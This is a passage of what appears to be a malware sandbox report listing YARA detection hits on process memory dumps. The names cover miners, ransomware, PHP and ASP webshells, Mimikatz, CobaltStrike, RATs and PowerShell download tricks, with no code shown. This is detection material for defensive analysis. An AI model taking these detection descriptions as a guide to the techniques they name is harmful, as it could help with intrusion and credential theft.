cryptocurrency miner, Source: 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18323946155.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18417573092.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000026.00000003.18352509630.00000138BD16D000.00000004.00000001.sdmp, Author: Cylance Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18297604848.00000138BD4A8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18357184238.00000138BD9CA000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18410085130.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_DeputyDog_Fexel, Description: unknown, Source: 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp, Author: ThreatConnect Intelligence Research Team Rule: Amplia_Security_Tool, Description: Amplia Security Tool, Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, Author: unknown Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp, Author: Joe Security Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: USG Rule: IMPLANT_5_v3, Description: XTunnel Implant by APT28, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: US CERT Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_cerber, Description: Yara detected Cerber ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_NoCry, Description: Yara detected NoCry Ransomware, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: Joe Security Rule: malware_red_leaves_memory, Description: Red Leaves C&C left in memory, use with Volatility / Rekall, Source: 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp, Author: David Cannings Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306564142.00000138BD4E3000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Joe Security Rule: PoisonIvy_3, Description: unknown, Source: 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18337194064.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18408563136.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: korlia, Description: unknown, Source: 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp, Author: Nick Hoffman Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18352805869.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18418537892.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: HackTool_MSIL_SharPersist_2, Description: unknown, Source: 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, Author: Joe Security Rule: xtremrat, Description: Xtrem RAT v3.5, Source: 00000026.00000003.18324581744.00000138BDC1C000.00000004.00000001.sdmp, Author: Jean-Philippe Teissier / @Jipe_ Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18291167151.00000138BE1C8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18423541232.00000138BD8B1000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18330538197.00000138BE396000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18358332585.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, Author: Joe Security Rule: APT9002Strings, Description: 9002 Identifying Strings, Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, Author: Seth Hardy Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: TA17_293A_malware_1, Description: inveigh pen testing tools & related artifacts, Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, Author: US-CERT Code Analysis Team (modified by Florian Roth) Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Joe Security Rule: gh0st, Description: unknown, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: https://github.com/jackcr/ Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18294992845.00000138BE1C8000.00000004.00000001.sdmp, Author: Joe Security Rule: Ammyy_Admin_AA_v3, Description: Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18322216000.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Niros, Description: Yara detected Niros Ransomware, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18342357735.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_base64_encoded_payloads, Description: php webshell containing base64 encoded payload, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp 